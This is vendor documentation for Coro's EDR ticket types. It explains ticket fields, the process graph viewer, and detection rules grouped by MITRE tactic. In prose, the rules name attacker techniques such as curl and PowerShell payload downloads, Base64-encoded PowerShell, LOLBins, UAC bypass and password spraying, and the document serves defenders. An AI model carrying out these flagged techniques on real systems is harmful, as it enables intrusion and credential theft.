Ticket types for Endpoint Detection and Response (EDR)
Important
The tickets discussed in this article apply to devices running Windows or macOS Agents.
Coro detects and creates tickets based on malicious processes detection rules.
EDR ticket components
EDR tickets contain the following components:
-
Description
: The EDR ticket detection rule. Select
See more
to view a description of the detection rule that triggered the creation of the EDR ticket:
Coro displays the detection rule description:
- Process : The name of the process executable file which triggered the creation of the EDR ticket.
- Hash : The unique process identifier.
- Affected devices : Select the displayed device count to view the filtered Devices page showing the affected devices related to the EDR ticket.
-
Mitre
: This section lists specific techniques and tactics from the MITRE ATT&CK framework associated with the security incident. Each entry includes the tactic category and a detailed technique description. Select a technique ID to view detailed entries in the MITRE ATT&CK database and learn more about the security incident.
-
Findings
: This section displays additional details related to the process that triggered the creation of the EDR ticket:
Coro lists execution times for the process and any related parent or child processes.
Where available, use the View link to open a Process graph visualizer showing parent-child relationships for the associated process. For more information, see Process graph.
note
The process graph link exists only where Coro can access data to support the visualization. If the data is unavailable, the View link is hidden.
Select the dropdown adjacent to each finding to view more details:
-
Command line
: The full command used to start the process.
note
If the command line is base64 encoded, Coro automatically decodes and displays the text value.
- Path : The directory path of the malicious processes image file.
-
Command line
: The full command used to start the process.
Process graph
The process graph visually represents the process tree for the selected EDR ticket, highlighting both malicious and legitimate processes detected by Coro. Users can navigate through connected process nodes to explore parent and child processes, understand their relationships, and gather detailed information. This enables a quicker assessment of the investigated process to determine if it is malicious.
note
Coro supports process graphs for Windows and macOS devices.
The process graph is available only if Coro can access data for the selected process.
To view the process graph for an associated EDR ticket:
- Select the EDR ticket.
-
Go to the
Findings
section, locate the process record, and select
View
under the
Process graph
header:
Coro displays the process graph with the Anchor Process node selected:
Important
Coro designates the anchor process node as the process you selected from the Findings section of the selected EDR ticket.
The anchor process is the central node in the process graph. It links parent processes (showing all processes that led to the creation of the anchor process, starting from the root) to child processes (those initiated by the anchor process and its descendants). This provides a starting point for your investigation, enabling you to trace the lineage and impact of related processes.
Related process counters show the number of additional processes linked to the selected process node:
Process graph node properties
Each process graph node displays a set of properties.
Select a process node to see the following process properties:
- Related ticket : Select the link to go back to the related ticket.
- PID : The unique process identifier assigned by the operating system (OS).
- Related user : The user account that executed or interacted with the process.
- Execution Time : The timestamp when the process executed.
- Command Line Arguments : The full command used to start the process, including the path to the executable file and any passed arguments or parameters.
- Image file location : The process image directory path of the executable file that started the process.
- SHA256 Hash : The SHA-256 hash value of the selected process.
Process graph actions
Each process node has actions you can perform. To access these actions, select Actions for the selected process node:
The table below describes the outcome of each process node action:
Action | Outcome |
---|---|
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
Allow process | Prevents EDR tickets from triggering by marking the non-system process as safe. Related process information is not collected in the EDR Telemetry and Process tabs. |
EDR detection rules
Coro identifies malicious processes based on detection rules and creates tickets for detected events.
- Command and Control
- Credential Access
- Defense Evasion
- Discovery
- Execution
- Initial Access
- Persistence
- Privilege Escalation
Command and Control
Attackers use command and control techniques to control compromised devices, steal data, spread malware, or build botnets. They send commands and receive stolen data through command and control servers. Coro detects these activities and creates tickets for the following command and control rules:
Remote Access Tool Attack
Coro detects remote access tools on devices. Attackers often install and activate these tools covertly to gain unauthorized network access or expose private services. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Suspicious Usage of a LOLBin
Coro detects Living Off The Land Binaries (LOLBins) on devices. Attackers exploit these legitimate system tools to download or execute malicious activity while mimicking normal system processes. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Credential Access
Attackers use credential access techniques to steal or misuse login credentials and gain unauthorized access to data or devices. Coro detects these attempts and creates tickets for the following credential access rules:
- Brute force attempt using a non-existent username
- Repeated brute force attempts using wrong passwords
Brute force attempt using a non-existent username
Coro detects suspicious account activity on one or more devices. This activity suggests attempts to manipulate accounts or brute force user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Repeated brute force attempts using wrong passwords
Coro detects suspicious account activity on one or more devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials and potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Defense Evasion
Attackers use defense evasion techniques to avoid detection and bypass security mechanisms. Coro detects these attempts and creates tickets for the following defense evasion rules:
Malicious UAC Bypass
Coro detects User Account Control (UAC) bypasses on devices. Attackers use UAC bypass techniques to gain elevated system privileges. Coro keeps the tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Execution of a renamed tool
Coro detects renamed tools on devices. Attackers use this masquerading technique to avoid detection. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Discovery
Attackers use discovery techniques to gather information about the devices, networks, or infrastructure they’ve infiltrated. Coro detects these actions and creates tickets for the following discovery rules:
Unauthorized System Discovery Activity
Coro detects use of the whoami
command on devices. Attackers often run this command during system discovery to identify user accounts and privileges. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Execution
Attackers use execution techniques to run malicious code on target devices or networks. Coro detects these attempts and creates tickets for the following execution rules:
- Suspicious Usage of a LOLBin
- Malicious File Download and/or Execution
- Malicious PowerShell Download from External Source
- Malicious Base64-Encoded PowerShell Command Usage
Malicious File Download and/or Execution
Coro detects use of curl commands on devices. Attackers often use curl to download and remotely execute payloads, enabling discreet transfer and execution of malicious files. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Malicious PowerShell Download from External Source
Coro detects PowerShell execution with signs of file download attempts on devices. Attackers often exploit PowerShell’s scripting capabilities to covertly download and execute malicious payloads. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Malicious Base64-Encoded PowerShell Command Usage
Coro detects Base64-encoded PowerShell commands on devices. Attackers often use Base64 encoding to hide malicious scripts from detection tools. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Initial Access
Attackers use initial access techniques to gain entry into a network or device. Coro detects these attempts and creates tickets for Remote Access Tool Attacks.
Persistence
Attackers use persistence techniques to maintain long-term control of a device or network, often stealthily. Coro detects these actions and creates tickets for the following persistence rules:
Malicious Scheduled Task Creation/Execution
Coro detects scheduled task creation or execution on devices, which might indicate that attackers are attempting to gain persistence or execute malicious code at predetermined times. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Modification of User Accounts in Elevated Groups
Coro detects suspicious account activity on devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Password spray attack involving 200 login attempts
Coro detects suspicious account activity on devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Password spray attack involving 100 login attempts
Coro detects suspicious account activity on devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Privilege Escalation
Attackers use privilege escalation techniques to gain higher-level permissions on a device or network after initial access. Coro detects these attempts and creates tickets for the following privilege escalation events:
Elevated group adding and removal
Coro detects suspicious account activity on devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |